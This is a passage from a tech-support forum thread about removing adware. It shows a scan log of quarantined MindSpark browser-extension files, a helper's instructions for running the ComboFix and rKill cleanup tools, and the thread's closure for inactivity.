    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\RadioPlayerSprite.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\search_button.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\tvf_icon_guide.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\tvf_logo.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\wrench.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\chromeUtils.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exeManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exeManagerNMD.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exePackageManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\focusManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\globalBlacklistManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\messaging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\mutation_summary-min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\mutation_summary.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\nativeMessagingDispatcher.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\newTabInfo.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\newTabInitialize.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\options.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\readLocalStorage.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\reservespacefortoolbar.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\reservespaceifenabled.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\scriptInjector.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\searchContext.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\settingsOverrides.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\toolbarCookieParser.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\toolbarPreinit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\underscore-1.3.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\URILoaderContentScript.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\webTooltabAPI.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\Widget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetContentScriptInjectee.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetFactory.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetWindowManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\cache.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\ce.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\debug.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\ss.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\jquery-1.7.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\jquery-1.9.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\underscore-1.5.2.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\activePing.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\buttonLogger.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\competitorDnsList.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\console.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\FFPreferencesPersister.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\httpTransport.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\HttpURL.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\internationalSearch.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\LocalStoragePersister.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobal.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobal.unitTest.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobalNotes.txt, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\rsvp-latest.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\searchSuggestLocale.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\testHttpTransport.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\unifiedLogger.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\unifiedLogging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\universalConsole.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\utils.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\_metadata\verified_contents.json, Quarantined, [cdde81063366e5512c3bbb8311f4d729],

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
  13. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Please download ComboFix from Here, Here or Here to your Desktop.

    **Note: In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**
    • Never rename Combofix unless instructed.
    • Close any open browsers.
    • Very Important! Temporarily disable your anti-virus and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
    • Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
    • Close any open browsers.
    • WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
    • Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
    • If there is no internet connection after running Combofix, then restart your computer to restore back your connection.
      If the connection is not there use restore point you created prior to running Combofix.
    • Double click on combofix.exe & follow the prompts.

    • NOTE1. If Combofix asks you to install Recovery Console, please allow it.
      NOTE 2. If Combofix asks you to update the program, always do so.
    • When finished, it will produce a report for you.
    • Please post the "C:\ComboFix.txt"
    **Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall
    **Note 2 for AVG and CA Internet Security (Total Defense Internet Security) users: ComboFix will not run until AVG/CA Internet Security is uninstalled as a protective measure against the anti-virus. This is because AVG/CA Internet Security "falsely" detects ComboFix (or its embedded files) as a threat and may remove them resulting in the tool not working correctly which in turn can cause "unpredictable results". Since AVG/CA Internet Security cannot be effectively disabled before running ComboFix, the author recommends you to uninstall AVG/CA Internet Security first.
    Use AppRemover to uninstall it: http://www.appremover.com/
    We can reinstall it when we're done with CF.
    **Note 3: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion", restart computer to fix the issue.
    **Note 4: Some infections may take some significant time to be cured. As long as your computer clock is running Combofix is still working. Be patient.


    Make sure you re-enable your security programs when you're done with Combofix.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    NOTE.
    If, for some reason, Combofix refuses to run, try the following...

    Delete Combofix file, download fresh one, but rename combofix.exe to your_name.exe BEFORE saving it to your desktop.
    Do NOT run it yet.
    Download Rkill (courtesy of BleepingComputer.com) to your desktop.
    There are 2 different versions. If one of them won't run then download and try to run the other one.
    You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool, ignore them or shutdown your antivirus.

    rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
    iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

    Restart computer in safe mode

    • Double-click on the Rkill desktop icon to run the tool.
    • If using Windows Vista, 7 or 8 right-click on it and choose Run As Administrator.
    • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
    • If not, delete the file, then download and use the one provided in Link 2.
    • Do not reboot until instructed.
    • If the tool does not run from any of the links provided, please let me know.

    When the scan is done Notepad will open with rKill.txt log.
    NOTE. rKill.txt log will also be present on your desktop.

    Once you've gotten one of them to run, immediately run your_name.exe by double clicking on it.

    IF you had to run rKill, post BOTH logs, rKill.txt and Combofix.txt.
     
  14. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Still with me?
     
  15. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    This topic is marked as abandoned and closed due to inactivity.

    This member will NOT be eligible to receive any more help in malware removal forum.
     
Topic Status:
Not open for further replies.
